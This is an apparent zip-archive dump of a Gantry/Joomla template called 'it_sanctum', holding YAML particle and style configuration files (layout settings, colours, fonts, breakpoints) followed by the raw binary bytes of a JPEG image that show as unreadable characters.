behaviour: static
columns: '3'
gutter: enabled
autoplay: disable
navigation: arrows
animation: fade
duration: '200'
css:
  class: ''
extra: {  }
items: {  }
PK!������8it_sanctum/custom/config/default/particles/feedback.yamlnu&1i�enabled: '1'
mainheading: ''
introtext: ''
style: style1
behaviour: static
columns: '3'
autoplay: disable
navigation: dots
animation: fade
duration: '200'
css:
  class: ''
extra: {  }
items: {  }
PK!��s9  @it_sanctum/custom/config/default/particles/offcanvas-toggle.yamlnu&1i�enabled: '1'
icon: 'fa fa-bars'
PK!,��'==4it_sanctum/custom/config/default/particles/date.yamlnu&1i�enabled: '1'
css:
  class: date
date:
  formats: 'l, F d, Y'
PK!g�Brr7it_sanctum/custom/config/default/particles/pricing.yamlnu&1i�enabled: '1'
mainheading: ''
introtext: ''
style: style1
gutter: enabled
css:
  class: ''
extra: {  }
items: {  }
PK!�����9it_sanctum/custom/config/default/particles/portfolio.yamlnu&1i�enabled: '1'
mainheading: ''
introtext: ''
style: style1
columns: '3'
gutter: enabled
lightbox: enable
filters: disabled
filterall: All
filter1: ''
filter2: ''
filter3: ''
filter4: ''
filter5: ''
css:
  class: ''
extra: {  }
items: {  }
PK!��oo8it_sanctum/custom/config/default/particles/features.yamlnu&1i�enabled: '1'
mainheading: ''
introtext: ''
style: style1
columns: '3'
css:
  class: ''
extra: {  }
items: {  }
PK!a�Z�

7it_sanctum/custom/config/default/particles/content.yamlnu&1i�enabled: '1'
PK!f�L<,,6it_sanctum/custom/config/default/particles/custom.yamlnu&1i�enabled: '1'
html: ''
twig: '0'
filter: '0'
PK!�4&F��:it_sanctum/custom/config/default/particles/cta-button.yamlnu&1i�enabled: '1'
style: style1
title: ''
description: ''
link: ''
buttontext: ''
buttonicon: ''
target: _parent
css:
  class: ''
extra: {  }
PK!V*s�44<it_sanctum/custom/config/default/particles/main-feature.yamlnu&1i�enabled: '1'
layout: right
image: ''
alt: ''
imagewidth: '50'
imagebottom: 'yes'
title: ''
description: ''
link: ''
buttontext: ''
buttonicon: ''
target: _parent
link2: ''
buttontext2: ''
buttonicon2: ''
target2: _parent
css:
  class: ''
  left: ''
  right: ''
extra: {  }
extra_left: {  }
extra_right: {  }
PK!�@�8it_sanctum/custom/config/default/particles/position.yamlnu&1i�enabled: '1'
chrome: ''
PK!'k����8it_sanctum/custom/config/default/particles/branding.yamlnu&1i�enabled: '1'
content: 'Powered by <a href="http://www.gantry.org/" title="Gantry Framework" class="g-powered-by">Gantry Framework</a>'
css:
  class: branding
PK!m�����,it_sanctum/custom/config/default/styles.yamlnu&1i�preset: preset2
base:
  background-color: '#ffffff'
  background-image: ''
  background-repeat: no-repeat
  background-size: auto
  background-attachment: scroll
  text-color: '#959595'
fonts:
  body-font: family=Lato
  heading-font: family=Cormorant+SC
  menu-font: family=Cormorant+SC
fontsizes:
  body-font-size: 0.9rem
  menu-font-size: 1rem
accent:
  color-1: '#4f953b'
  color-2: '#282828'
drawer:
  background-color: '#ffffff'
  background-image: ''
  background-repeat: no-repeat
  background-size: auto
  background-attachment: scroll
  text-color: '#959595'
  heading-color: '#282828'
top:
  background-color: '#ffffff'
  background-image: ''
  background-repeat: no-repeat
  background-size: auto
  background-attachment: scroll
  text-color: '#959595'
  heading-color: '#282828'
header:
  background-color: '#ffffff'
  background-image: ''
  background-repeat: no-repeat
  background-size: auto
  background-attachment: scroll
  text-color: '#959595'
  heading-color: '#282828'
navigation:
  background-color: '#ffffff'
  background-image: ''
  background-repeat: no-repeat
  background-size: auto
  background-attachment: scroll
  text-color: '#008056'
  heading-color: '#959595'
breadcrumb:
  background-color: '#ffffff'
  background-image: 'gantry-media://bread.png'
  background-repeat: no-repeat
  background-size: auto
  background-attachment: scroll
  text-color: '#959595'
  heading-color: '#282828'
fullwidth:
  background-color: '#f7f7f7'
  background-image: ''
  background-repeat: no-repeat
  background-size: auto
  background-attachment: scroll
  text-color: '#008056'
  heading-color: '#282828'
showcase:
  background-color: '#ffffff'
  background-image: ''
  background-repeat: repeat
  background-size: auto
  background-attachment: scroll
  text-color: '#006142'
  heading-color: '#282828'
intro:
  background-color: '#f7f7f7'
  background-image: ''
  background-repeat: no-repeat
  background-size: auto
  background-attachment: scroll
  text-color: '#2b2b2b'
  heading-color: '#008056'
feature:
  background-color: '#ffffff'
  background-image: ''
  background-repeat: no-repeat
  background-size: auto
  background-attachment: scroll
  text-color: '#959595'
  heading-color: '#68ad53'
subfeature:
  background-color: '#f7f7f7'
  background-image: ''
  background-repeat: no-repeat
  background-size: auto
  background-attachment: scroll
  text-color: '#959595'
  heading-color: '#68ad53'
utility:
  background-color: '#ffffff'
  background-image: ''
  background-repeat: no-repeat
  background-size: auto
  background-attachment: scroll
  text-color: '#959595'
  heading-color: '#282828'
maintop:
  background-color: '#f7f7f7'
  background-image: ''
  background-repeat: no-repeat
  background-size: auto
  background-attachment: scroll
  text-color: '#959595'
  heading-color: '#282828'
systemmessages:
  background-color: '#ffffff'
  background-image: ''
  background-repeat: no-repeat
  background-size: auto
  background-attachment: scroll
  text-color: '#959595'
  heading-color: '#282828'
sidebar:
  background-color: '#ffffff'
  background-image: ''
  background-repeat: no-repeat
  background-size: auto
  background-attachment: scroll
  text-color: '#959595'
  heading-color: '#282828'
mainbody:
  background-color: '#ffffff'
  background-image: ''
  background-repeat: no-repeat
  background-size: auto
  background-attachment: scroll
  text-color: '#959595'
  heading-color: '#282828'
aside:
  background-color: '#ffffff'
  background-image: ''
  background-repeat: no-repeat
  background-size: auto
  background-attachment: scroll
  text-color: '#959595'
  heading-color: '#282828'
mainbottom:
  background-color: '#f7f7f7'
  background-image: ''
  background-repeat: no-repeat
  background-size: auto
  background-attachment: scroll
  text-color: '#959595'
  heading-color: '#282828'
extension:
  background-color: '#ffffff'
  background-image: ''
  background-repeat: no-repeat
  background-size: auto
  background-attachment: scroll
  text-color: '#959595'
  heading-color: '#282828'
additional:
  background-color: '#f7f7f7'
  background-image: ''
  background-repeat: no-repeat
  background-size: auto
  background-attachment: scroll
  text-color: '#959595'
  heading-color: '#282828'
prebottom:
  background-color: '#ffffff'
  background-image: ''
  background-repeat: no-repeat
  background-size: auto
  background-attachment: scroll
  text-color: '#959595'
  heading-color: '#282828'
bottom:
  background-color: '#f7f7f7'
  background-image: ''
  background-repeat: no-repeat
  background-size: auto
  background-attachment: scroll
  text-color: '#959595'
  heading-color: '#282828'
afterbottom:
  background-color: '#ffffff'
  background-image: ''
  background-repeat: no-repeat
  background-size: auto
  background-attachment: scroll
  text-color: '#959595'
  heading-color: '#282828'
last:
  background-color: '#ffffff'
  background-image: 'gantry-media://doves.png'
  background-repeat: no-repeat
  background-size: auto
  background-attachment: scroll
  text-color: '#959595'
  heading-color: '#008056'
footer:
  background-color: '#282828'
  background-image: 'gantry-media://footer.jpg'
  background-repeat: no-repeat
  background-size: cover
  background-attachment: scroll
  text-color: '#6f6f6f'
  heading-color: '#ffffff'
copyright:
  background-color: '#ffffff'
  background-image: ''
  background-repeat: no-repeat
  background-size: auto
  background-attachment: scroll
  text-color: '#959595'
  heading-color: '#959595'
offcanvas:
  background: '#ffffff'
  text-color: '#959595'
  width: 17rem
  toggle-color: '#959595'
  toggle-position: left
  overlay: 'rgba(0, 0, 0, 0.6)'
breakpoints:
  large-desktop-container: 75rem
  desktop-container: 60rem
  tablet-container: 48rem
  large-mobile-container: 30rem
  mobile-menu-breakpoint: 48rem
menu:
  col-width: 180px
  animation: g-fade
PK!Aw�-��!it_sanctum/custom/images/info.jpgnu�[������JFIF``��"ExifMM*��C		



	
��C����"��	
���}!1AQa"q2���#B��R��$3br�	
%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz������������������������������������������������������������������������	
���w!1AQaq"2�B����	#3R�br�
$4�%�&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz�����������������������������������������������������������������������?�袊(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(�������!�9%�C��1�u��N�?�U�w�G��/�_^C'ݟ�"h�?���'�^��o�"W��F�u�é' �z�9�a20��죗���ɜu�-/�T����+�;���o����A�º^~��}���~������^��x<i��k�'�5�}��<�7���kѧ�y���ݽZ�3ͩ��t?���#�~�������>����<]�c�����u�x�	!�<xsi�Ὄ��˜�LG�]��k��W���S�0K�R%�g���
h��7�-/��
���D��?����i?�ý���v{zy%�x��PWTx2�ڨ���Q�4�޿���,�?�t����|t��L~B�a�;h�Ƌ�(��W����_�&O��J?�7�j3�36Է���FMi�0�׷�[��EM4S�R�����b�g�>�o��c��h#��l��/��ɾ������������'�o�o���	K��Z?�7�j4�W�y�~���~���篟�[I���
r���
�K]
�(���`�-����e.��j/���5�Q�T�޿��]����$����=�o��03��ym��9��+��7���>���X<]���l�}���I\��j�\_���O�0O�R_%�g�����7��w{��~"x�O���l����g��Ҽ��?�n��lU�����Q�����;���k��
�0��w�k���|M�O�^[�?��E}m�o�"G�� �i��H�[M�!�Nb'�����K�{���������K4��F?Z�e��_ħ%�g�G2��H��<�����K9�)��)c;YJ��B
G\g`QEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQE:(�iY��UU$�€E}�C�	y����P�i~���ٰE��F��тɉ}����+������'��N�e�������a��Gֽ\.K��kN��w��C��g�,>�*+�Z��?0�i�#��n|�	�K�~$`�X��t��i�H_� W���%����)4��z��x?j֋jR1��ًF���Z��;M���b�������P��8ǠQ�J�7��^�^I_�v�����5��~m��W���_��D��LRj�n���Y9/�j
�m��#��
�C���٘���m[P����Gg��	%2��W��a�_O⋓��dx8�*�*|2Q^K��ϙ~����6X��׮���o%���p���v�'��|.�c�υ|9��Q�
7M�׏�f��J+٣��G�PQ�H�c1��7/V�QE�sQ@Q@Q@Q@Q@Q@Q@Q@Q@Q@xOⅹ�ľ��#+�n��Ct1��5�?��_���a#����.d�'�/f���1����(�z�:��/T��G^�����?8~'����I�߈�ƚ�R
f�;���H�X��5��O�!��O��I4��6����r�)p"9�R�ٯ��+��p���q��t{8~)�)|RR^k������w�_|��|[�?xq�mS�XKH�f[ꤊ�k���S�����-�R�E*G��>�����>6,�j>�t��2~ע����b!ڌ�V���ZШ��V�U�#��q���my����?h���_�o-��[��~>��1���H���B������Q4ڗ�o��:��hg�F���2"��-|�+$��Mۺ�~��X\��ҝE~�G���ϔS���h�F�Hث+2���M�(���(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(���u���_|M��}T��q�-l-�y1ܐ��Gv8����f� w�<t����i�kR�ڋ�BT�1��s��k��bqN� ߟO�c��a���旗_�s�J�?��	���n<?��M&l0�uQ�2����n��5z�������f���h~�Ե�p1����{��q�6���꾷��k?����o}�,>r�%�#�����M�į]k/�v��f�ѧ�u�u#>����/�����'A�n#]�l[:���ě�?BدJ���	��0��O���g��3l^'��mv�}�(���4(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(�������?�:ݗƞ���v���ɼA�ǶQ�
������hOy����%�ɧkI��\�uf@$E�yd5�5Ey���	��4}�z��py�/
���n���A��6~2~�i5ν����&��i?�aG�1�-�ȩ^_Ӆx?���;�M-��4�b�$��87���1Q�C�]U��q�����K��W��/����?���~�_��_�@�x �j
��?i�]>����'ɐ���=�����ğ<K.��V�-ml�HG��`7)�� �5�X̻�v���}�]�̰إzO˯ݹ�EW�QEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEW�~���?ڷ_6>��檑0[��+O��3a㝹,{_�?�w�{���˫|P��4Փ��j^
.�cēc�b��
z�~M��;ҏ����yY�u���U���j��|��π����w^���?��-q���qyv������#N9�0'�5�'�.��t]+}O�ƽ&�wÝG���_�d��$��x=��
�t�h6�^��X�:e�ypZY��A
�*(��
��
�h�ս�y���|6aŘ���r>[��>_y�(�+�/�~]���|;�.7Ecn���q��|���1'޺�(���c�d|��)>i;���*�
(��
(��
(��
(��
(��
(��
(��
(��
(��
(��
(��
(��
(��
(��
(��
(��
(��
(��
(��
(��
(��
(��
�~)�������i>"�[$C}n�����Q��R�����EIr�]J/�.�������I�����ô�m��s�d��$��~w|���!~���|q�}KE��!�d�,���ߎp#����<+���A���6�V�/d���,�L���
���9�
�k{�}�ym�t�}���W������������X�<� \��u�Bu��fܗ���n�d�'��P8+�W����>"~�:��|m��2)���:����\�8�i!�ꢾ#0�qX=j���_�>g����J^�g����<Ί(�(���(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(����h��#խ�4�K����P[����;���%���~�~ş�B�x���ˋ��
�#��YN�r:�5�X�w�~��<�n/���%�Ϣ�g;0��!�^V�������0���a���> ��h� Rq�G8H�� {�����|'���wP���R�hZ|��'�%�a�#�v.F2��?�G�|���N��k�+c�s���vrX��U_{��
�#ߗ�]~q��g�X���܏�}>_y��/�>����>�b�]��������+J�+�RIY*�ۻ
(����(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(���W�-/�~��u�6�W���qiy�������Т��VcM�t~w���A���]k_��ޤِ�w��i󞸊^^���8 ��ߍ|c�;��Mƞ�|?�&J����G�e$_����_�r�>	xO�f���?�L�7Q���7��
�̄0���̸[^����˧��>�,�EC���_>�?��nh����K�S�x]k��n<M��d�B�u���|��fQ�ӵ�o&�>���ú�ņ�isc}g!�{{��)aq�VV������$�+��}�>����p�+�u^��EW�QEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQZ^�~������y�jڌ�kKHZY�s�Uy4�m�	��ٛ_A~��Mψ����Ɠg���4�eƿ-��������xf\��3���Yx}l�Q���/��A&�xQ��T���4;8�+�kI�mt
.��������5�x#�
(�UU*���_c���Z�3�_������͸��K�?��;�^����_�N߇?��������Ymο�"�y&Fc��������f��+�(a�т�I$�D|
|EJ�u*���Š(��B�(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��+���x�:���oi�پ$�=�����w��� ���;J���Z+�)փ�U&�FmCR��JM����K���l�D���	.�K?��	��m��٭�8U�y09�I8Vl�򿦍WJ��tˋ+�k{�;��)�1$S#e9�pA���G��6��(��G��'L�����m��=O�do�L{F�g<2�<ۅgN�p~�^�ӿ��}�SŐ�jX�u�7G����?+��/x7V�}�k�\�o��[O��sgwC4;2�z���ͯ�i�f}��j�(��C
(��
(��
(��
(��
(��
(��
(��
(��
(��
(��
(��
(��
(��
(��
(��
(��
(��
(��
(��
(��
(��
(��
(��
(��
(��
(��
(��
(��
(��
(��
(��
(��
(��
(��
(��
(��
(��?���F}c��|a�B���{]'&�az�����:m=v`�5�U=�w�/6q�q�p���we��$|���~<���[�_Y��C��.��]�[;!�*����מA;W��߱���ث�~O�,~ݯ�F�]�UkۯUS�(�	���b7W�x�Z/�	X�>��}M�Emii�(����I�I$�ֵ~���0K�������?3���5�G݇n���6
(����Š(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(����`_�ڞ0����:��e,5�4{i��<�c|�N6����l��#ǟ�G����+?�h7R��D-gx:�'�rc�m���_�d��7��
_h~ �쵍R��sgw�)��C�=A�^m��Ʈu�Ͽ^����A_��ݽ;zl4�W��P��#&��S��0�[
�<$����9��H^��y��}G]�W��
l%OeYY��7�����h;��y0��+��
(��
(��
(��
(��
(��
(��
(��
(��
(��
(��
(��
(��
(��
(��
(��
(��
(��
(��
(��
(��
(��
(��
(��
(��
(��
(��
(��
(��
(��
(��
(��
(��
(��
(��
��_�'��t=>�Vյ)D���&��@�9?�s]7�:������i�_�rjZ���#��8�M3�H�=O$�I����N?��>Y�Xu�_DQ�%�n�
�<��O���B�YFK[;� ���#��3�8Y�7��_e��7���:i?V��_ �׼h�f��&���'��q�︇�� =}�E�~GO�QV_��g��ul]Ok]��Q]gQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEW�_�Q��#����;�|4��A�n��M��[n������1��$�}�Erc04qT��eu��4v`�հ�=�g�?&4>0�v����.��^i:��)����#�8�O#��k6�y�o_�''�m�
��=Ɩ1ӵ�b�`r!�G�ȳ��.IR2��hO���߲�ċ�x�K�Mԭ�h�|�^E�h_���Q�9�f�-l���������r|�:ZMn�U�~GEW�{aEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEP^���1���#.���i����k��.��O�Hpv�X���E��=�Q�q��e���x;L�
[Zx��>L ��ۢ�v
�}�/�O��g����#�å�z�̗n�W��69c�8�����m)�/�˻���g>�`ױ��O�z��_�=�(~������	�mgė���5ާ(�%`;d�Q�Pp$�P���*�(S��MY-���Z��7R��{���+C0��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(�1��d�~�
&�ߋlD�C=��w�JG�ȟtS�`0A��EgR�*A¢�{�JUgNj�7f�g��f~��0��>#���;�i��ͥk!�.��?� ��9R{�V>;_��O�>���_�O��\:���/*�Io ��b~�"��H?��������y�ǃu9H�u��
�O�0$�v��_�s���j:�W�����nC��/c[J������/�袊���Š(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(�����u��9����i��N��-&`5MX'�3�[熔�d�#�UY?���N�s����.~Ѥ�G��u@�i���g���2y�q�*����ᾇ�o��7��i&�����ƣ�f'$��bI$�M}VA�<S��׹�7��8��<>��_��#�[�@�-�-7�>�-�}I�Cmm
�(��fc��I,I$�k����"1Q\���Rr|�հ��*�
(��
(��
(��
(��
(��
(��
(��
(��
(��
(��
(��
(��
(��
(��
(��
(��
(��
(��
(��
(��
(��
(��
(��
(��
(��
(��
(��
(��
(��
(��
(��
(��
(��
(��
(��
(��
(��
(��
(��
(��
�)|-�Ưj^�F�m�hz�F+�i��aف꬧YH*@ �+���QR\�ب���GF��_�(���_��<o���kզ#K�J�c��k�,�g�p20C*��_ү�����^�&�m�h��&�Y�+"��08!�H@5�����uk�����k��[�:��iZ�\�
�4��J�8<Q��W�|� xW��|W��?K� X�����Ώ���4�E�ՅQ@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@}	����5�ۏ����g�ty��X/��<�"�
3��B������O�x����o��Z�L��>���e��m��?ޑ�B&r��C0���3����/�>��O���%ß�,��R9��0�#x�{j��_������ ϖƏ���_?[�~�?��x_�:m�����m��(�X���rY�KI$��(��L�TW,vG��断�QTHQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQE|��l��^��ʓ]hz.�x�Q�����b�q��4�`��5ϊ�����V�����8\lL���[�>��U�6weTPY������=�W~~��\Z�x�?j��Xh��@GU2!Vi���O�B�*��WW��ė�,���4�ֺr��̘�����U�x�0w�������\�sb��������H|���$��!o����)���$se�xê�NѢp�O�y��5��ճ�}W�Uk�O���Q�r�_
$�u��{���L��5������o���#�+�
��@h�+C�;]r�<���~O�W'��*�����������K[�G�_�}y��.��H��Z���z���D���g��k�~���7�I^4�qi:��˭Ph��!�6E~iQ]Ts�}?��~��w8�d9}U�RK�O�����+��ώRCo���Ԧ��!��$O;-�<�W�vW��Vq�[�ż�9cp�"�ApA���W�~������KP�O����>�4����>]жTݗk�+�0|a4�qP����>��k�;>�5�L��(���c�-��>6�i��B���b#K�!m"�Ϥ��@O��Q�=	��x�I#u�92:���=�����b��BW_��]��`k�g�����~���(���@��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(�����W�5?��M�մMb
ʹÆC�YN
��R]2��喩�8�h��%���5��s�y��j~
��f�ur����\p� �8>a�/ϕ� |v���?�~��X.����a�KwrX�dS�o����x��(��q�iZ�L��>���m�S��7�ȹ�9S�X�g��K�Q��oN�����c[���]�{�����E�'�Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@w����Oڃ�ޗ��Z}�Rԟ瑁�l��<�>�hI�N� g���> x�O��[�KVծ����$�¨�~��9?`�+� �F�̶��6�%�5�"�#�ʏ'��l��
��K�KZ�H-����x��q
�f�_��_������c���>��>c.&�/�@'��H����T�$�}W�ԩB�:j�l�ɪ՝Y���݅QZ�Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@U�u�/�Z��wm��14�77�5gf<*�	$�[��7��j�ս���/qsq;��5�ُ@�z_��T�*&��Zk��}�Ν��O���.�"�%�u2��fo�j���f԰4�笞˿���r��꼐�+w�dv��Q��,���j��
o.�_
�h.���C{���Dxha>�;�A*?�ɢ��������k;��y#�l�������Š(�3�(��(��(��(��+���#�
��?���Eդ��W��K�\ͧ)<�����_,����N�N������*�efsⰴ��*Ѻ���@���¿��Û?x?V�V�o7/�%��
�J���r2���A=�>?�o��ث���4�:M�,z���o��B:,��Q�ʟU,���G�/���
�xZ�^i�[�8@㇊E���z�2'�:�:��[��y~G��G<�����~���E�QEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEW���?���l_����;�6�~��e�,��8e$q��EgV�*AӨ���ҕYҚ�M٭����_��?e��z��|Sk�}KM�EɆ�������A�A�_���Q��'J����0�����4yt=E�2�M�������6g�o¿�?T��CC֬n4�[I�{[�Y�l�H��{�5�Nu�KZ�X=����~����Q��ku��'��QEx��QEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQ_{���<_�/X���?�Qk2|����A���Þ��B���
�.��Kw�.�;O	E׫��_d}�u��q�������+�5�m��N�6�h���"�{����w�������~/�?�cjb�:�w�삊(���(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��Q�����
�%��m�hw~G�|h$����0�<���T0U?�pFv���b���*�6_��ta0��V�
{�O�|������I�?��	|}�Ώ6�z��T�C���(�s���	���g.Ř�f9$�����꘺εN���~ɗ�i�(*4�o���+��
(��
(��
(��
(��
(��
(��
��	?�{M�!�fM]�e��ɒE]�M6s��x��,���QE|�EtaqU0�cZ��V����-<M)Q���G���<J����2�����_�?lg���O�w^w���AH�{�8�{�����W�5�M׆�}���g����T�?����Q]G(QEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEW�?�X��'�z�������o�N����D@zx�q��m��uɎ���Qtj���mL%e^���]����_{�f��_7����.?�mi|�E㟾����;+�8��	�ȱ�*�J΍]�⻟�`q��tUz[?��aEW�QEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQZ^���zn���ͨjڽ�ZZ[B2���T}I�SI�d'$���_�O�k�~�,�9m�Z�V;n��A�;Py�<�ʃ�I8¶?{�	�}'ៃt��V0�>�l��v�,1���ܞI�9&�����4�د���!�k�ؼ�o�������\c�A��f�n��r�`�^���u�?'���k�v����
(���
(��
(��
(��
(��
(��
(��
(��
(��
(��
(��
(��
(��
(��
(��
(��
(��
(��
(���F���U$���O�(��G'�g�Vx��P�4�
���z"��[8I
��F/)���~���S�<7����Q����kp�O`v���(�OfX|��~W�q�5�X���~�����V�._�_��?��+ᏻ
(��
(��
(��
(��
(��
(��
(��
(��=��	��JI�)�՞�S��i-8���{)�YI�|��薿���Y�VVVVV �Q_̍~��.�87ǿ؇�:���mKI�:-�',e�>R��ш��_s���y�e�%�?�^2��C��~��TQE}��!EPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPO��
��L�n��v�KG�-����Q��7#�r`�����c][�(��y�ۯ:�A��w�j�^Z��$q�G�\q�0˟��G�������W���f�m���hW�?����_.A�8��׃��+B�㷟�ϧ��?�<{O�^.�G�Eix�����Z�g6��i7/iwm2���)�Y��SM;3�u$��QE�QEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQE���5����4?�\�(�������`�9���d����r�x�7C�_��6�c��G����n��<'���5�����,
ݞVGp��gn+��I�mt*����K;(�x"@�����@:_e¹O���*�#�/���,ͽ�>�I�/��v��^��(��B?;
(��
(��
(��
(��
(��
(��
(��
(��
(��
(��
(��
(��
(��
(��
(��
(��
(��
(��
(��?2��/��|7�\2��Z��y��p?�ů��ໞ-o��-bX��:��^˸�9����~G��u3
���ݡ���y}%�_��(����d(��(��(��(��(��(��(��(��+�#�
���>����d;l�u�d�_5������}���{h����_�z��v.��0?P����k��{<›��/Q��}E�_�w?e(���h��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(�������c�Z�.oY���MD���ļ�@0���|#��m<$�W��ѫ�6���uc}o
ݕ�O��x捁VF��=A����)�aq����M�s?������?4,��&;Or��u~{�YO���)-%�y>�?����oi��z���]�_����Q_}�QEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEU�F���i��[�y}}2[���i��(I$=MU�п�!W�[�	珮>.k�����ֺJ�-��<������k�/�O��u��uga��*�鷛菻��߱ݧ�a�:i��2x�R��t�7�t�?v�D�E�p̀X׻QE~Ç�
4�*j�+#�Ey֨��wm݅Q[�Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@��X�ֽ���|C�r��gF��
:��_1���Y-9�?���r�t���l�
|�_���[�4�6~ӕ�Q����AEW	�QEQEQEQEQEQEQEQE���Tm;�
-�4ݵo#�`q��p�Q_.����F
!�?�(��%+a�p����?Wߕ_봭�������k�,�&~�QE�)��QEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEW��D�c�O�?�t�4��K�f�A�|*�T��d�r��e[��w���P�jn�Etՙ���ԍZn�;����t{�j�Z}��֗�3=���Y!��#� ��Z�B�ຟ�o� >?����Zm�<O(��R5�m���L@�&Q�����~z��ن
xJ�>�y����/�C��xu��AEW�QEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEu��k�7��/A���Av�ѱX����(������1�G���6���'J�ZÐJG/#c���v=ٍ|/���DŽ<�|\֭v�^#
��bE�5lK0�C$�����_�U�We�‡�&���߿�~e�Y���}^?����
(����@��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(������k�l�z��m.w�gG�>�F���=~��ÿ
Z���|m_.�yq�]8D�%�>��/�c_��O0��������;YU����s��QEx��QEQEQEQEQEQEQEQE�7����~�:�ɘt?
N���,���?�*�f�W?��o�m��(��Z��ҭه;-�29Ů���{|;E��)������{<���e���)EW�'�aEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEP+����6���~;J���́�DO)"�:8WSٔW�����Ʊ�<�_����O�mm#BνRU��:u�a_�~v��yc����4[\�^	��5�k6lE1�1��I�Q��W�r�o�����u���Ϭ�\��b>�7���O�o�����+�S�(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(�K���g-C�����7�28�K���
3�;D����!���+��?�'�¸�7��Oխ�j�5ͮ��~ht�ߖǛ*��b������{�b�I�;�E�{Nu�,UWŲ��������M7C�-c���{X��-�,1F�QG�@�E��I+#��&��QE�QEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEx��o�c�D�m��I,�|��%�G�r�^}$5��2�b�
��{W��_�?�W��-�f_گP�4�_'��:i5}4��8e-���6Hۀ��|G`[�qq�?>h��
